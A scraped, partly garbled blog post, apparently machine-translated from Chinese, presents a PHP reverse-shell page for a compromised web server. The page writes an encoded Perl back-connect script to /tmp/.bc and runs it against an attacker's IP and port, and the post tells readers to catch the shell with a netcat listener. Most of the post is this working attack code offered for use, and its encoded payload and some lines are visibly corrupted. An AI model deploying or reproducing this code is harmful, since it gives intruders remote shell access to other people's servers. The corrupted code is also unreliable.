I was very helpless and didn't think of any good solution, but then I had an idea. Put a php page, and you can directly pop back to the shell. Moreover, operating under the console is much more convenient than using the webshell, and there will be no timeout or the like.
Because I don’t know PHP very well, I asked the wretched Nono and Xiaoyu to modify the code. The rebound code was extracted from phpspy2008, but it cannot be used directly and needs to be modified into a separate PHP file. After uploading, listen to a port locally, set the bounce IP and port in the code, and then access it directly, a shell will pop up.
Disclaimer, there is no technical content, it is mainly for convenience. In this way, you can directly access this php page every time and pop back to the shell without having to do other tedious operations. The modified code is posted below
Copy the code The code is as follows:
function which($pr) {
$path = execute("which $pr");
return ($path ? $ path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents() ;
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@ feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $ res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode ($text));
@fclose($fp);
}
}
$yourip = "your IP";
$yourport = 'your port';
$ usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmF tZSAtYWAiO2Vj". 🎜>"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". xuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". NCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/ tmp/.bc',$back_connect);
$ res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
First execute nc -l -vv - locally p port and then visit this php page http://www.site.com/fuck.php and you will get a rebound shell locally.
Only for obscene streams. If you have any good obscene methods, please feel free to give me some advice.
http://www.bkjia.com/PHPjc/319990.html
www.bkjia.com
truehttp: //www.bkjia.com/PHPjc/319990.htmlTechArticleI was very helpless and didn’t think of any good way, but then I had a flash of inspiration. Put a php page, and you can directly pop back to the shell. Moreover, operating under the console is much more convenient than webshell, and it doesn't...
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
